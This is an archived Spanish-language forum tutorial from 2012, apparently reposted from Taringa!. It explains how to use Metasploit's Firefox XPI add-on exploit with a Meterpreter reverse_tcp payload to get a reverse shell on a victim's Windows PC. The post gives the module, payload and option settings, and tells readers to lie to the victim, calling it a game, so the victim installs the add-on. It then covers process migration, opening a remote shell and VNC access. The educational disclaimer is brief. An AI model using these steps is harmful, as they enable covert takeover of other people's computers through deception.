InicioLinuxReverse Shell a Firefox y algo de Meterpreter BackTrack

Reverse Shell a Firefox y algo de Meterpreter BackTrack

Linux•12/26/2012
Hola ahora les traigo un tutorial de como hacer un Reverse Shell a firefox construllendo un Complemento malicioso XPI y una ves logrado esto pondremos en marcha algunas funciones de meterpreter

Necesitas:


- Tener Instalado BackTrack Descargar aquí
- Conocimientos básicos de comandos en Terminal de linux
- Paciencia & Dedicación



Algo de Teoría:


BackTrack
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.

Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX. WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix. La última versión de esta distribución cambió el sistema base, antes basado en Slax y ahora en Ubuntu.

Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless. Fue incluida en el puesto 7 de la famosa lista "Top 100 Network Security Tools" de 2006.

Metasploit
Metasploit Es un proyecto open source de seguridad informática que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración y en el desarrollo de firmas para Sistemas de Detección de Intrusos.
Su subproyecto más conocido es el Metasploit Framework, una herramienta para desarrollar y ejecutar exploits contra una máquina remota. Otros subproyectos importantes son la bases de datos de opcodes (códigos de operación), un archivo de shellcodes, e investigación sobre seguridad. Inicialmente fue creado utilizando el lenguaje de programación de scripting Perl, aunque actualmente el Metasploit Framework ha sido escrito de nuevo completamente en el lenguaje Ruby.

Metpreter
Meterpreter es una impresionante utilidad que permite obtener una gran cantidad de información sobre un objetivo comprometido, así como también manipular procesos del sistema y/o terminarlos. Meterpreter es un interprete de comandos que permite de una forma segura y suave interactuar con la maquina objetivo ganando por una parte la flexibilidad de un stagers (ejecución de múltiples comandos en un payload) y por otra parte, la fiabilidad de que no será detectado fácilmente por un antivirus, firewall o IDS ya que se ejecuta como un proceso en el sistema operativo y no escribe ningún fichero al sistema remoto.


Tutorial

Primero lo que vamos a hacer es Prender nuestra Pc con BackTrack en mi caso lo tengo instalado en VBox


Una ves echo eso abrimos una terminal y ejecutamos msfconsole


Esperamos a que se ejecute y cuando termine nos va a mostrar una una figura en la terminal
NOTA: no te tiene que aparecer esta imagen, son varias te puede salir una diferente


Ejecutamos search xpi para que nos busque el exploit que vamos a utilizar.


Nos va a desplegar una lista de Exploit's y el que vamos a usar con el comando use es el segundo "exploit/multi/browser/firefox_xpi_bootstrapped_addon"


ya cuando se realizo la selección del exploit vamos a poner show options para ver las 3 opciones que tenemos que modificar.


SRVHOST - Es nuestro local Host osea la ip que tienes asignada para saber tu ip solo basta con poner un ifconfig
SRVPORT - Es el puerto por default te pone el 8080 lo cambiaremos al 80
URIPATH - Esto es lo que sigue de la ip por ejemplo 192.168.1.18/juegos el /juegos viene siendo nuestro uripath

para modificar estas tres opciones vamos a usar el comando set y enseguida el nombre de la opcion

Donde
SRVHOST en mi caso es 192.168.1.72
SRVPORT le puse el 80 como lo indique arriba
URIPATH le puse /JUEGO

para ver si se realizaron estos cambios volvemos a poner show options

vemos que se cambiaron con éxito

ahora lo que vamos a hacer es seleccionar el payload que vamos a utilizar con el comando set payload que va a ser windows/meterpreter/reverse_tcp


volvemos a poner show options y veremos mas abajo que se a seleccionado el payload y mas abajo vemos LHOST & LPOST

Donde

LHOST - es la ip que tenemos para saber tu ip solo basta con poner un ifconfig
LPORT el es puerto por el cual nos va a hacer la conexión pondremos el 443

Loas cambiaremos con el comando set


ponemos show options y veremos que se realizaron los cambios con éxito


ya no queda mas que lanzar el exploit con el comando exploit y esperar a que termine de ejecutarse

Si observamos lo que esta seleccionado es una especie de url que es la que le vamos a pasar a nuestra victima que cuente con mozilla firefox instalado ya es cuenta de ustedes pasar esa url a la victima lavenle el cerebro y miente que es un juego no se lo que se te ocurra ojo la victima tiene que estar conectada en tu red

Pc Victima

le pasas la url a tu victima le dices que la ponga en la barra de direcciones de firefox


y que le de permitir para que el complemento se instale



Pc Atacante

Vemos que ya hay actividad que se estan haciendo peticiones y esta esperando a que la victima le de en aceptar



Pc Victima

mientras tanto en la Pc victima el usuario acepta el complemento y lo instala



Pc Atacante

y así obtenemos una sesión


y para entrar a la sesión solo basta con poner sessions -i 1 donde 1 es el numero de la sesión

si pones un ? podrás ver algunas funciones de meterpreter

la que vamos a usar para poder entrar a la pc victima es la de ps y buscamos el proceso explorer.exe


ponemos migrate que es para migrar a ese proceso y el PID que en mi caso es el 292


si todo salio bien usaremos el comando shell que nos mostrara la terminal de windows de la victima

para salir solo basta con poner exit

para hacer un enlace vnc y conocer sus opciones es solo poner run vnc -h y nos mostrara las opciones

y para un enlace vnc run vnc -P 80
Donde
-P significa el numero de puerto
80 es el numero de puerto que puse al principio

NOTA: de esto no tengo imagen por que el antivirus no me dejo realizar esta conexion espero y a ustedes si les funcione Este tema es con fines educativos no me ago responsable por el mal uso que se le de Gracias !!!

Espero y les guste cualquier cosa me lo hacen saber


backtrack






Datos archivados del Taringa! original
56puntos
987visitas
0comentarios
Actividad nueva en Posteamelo
0puntos
10visitas
0comentarios
Dar puntos:

Dejá tu comentario

0/2000

Autor del Post

i
ivaby18🇦🇷
Usuario
Puntos0
Posts22
Ver perfil →
PosteameloArchivo Histórico de Taringa! (2004-2017). Preservando la inteligencia colectiva de la internet hispanohablante.

CONTACTO

18 de Septiembre 455, Casilla 52

Chillán, Región de Ñuble, Chile

Solo correo postal

© 2026 Posteamelo.com. No afiliado con Taringa! ni sus sucesores.

Contenido preservado con fines históricos y culturales.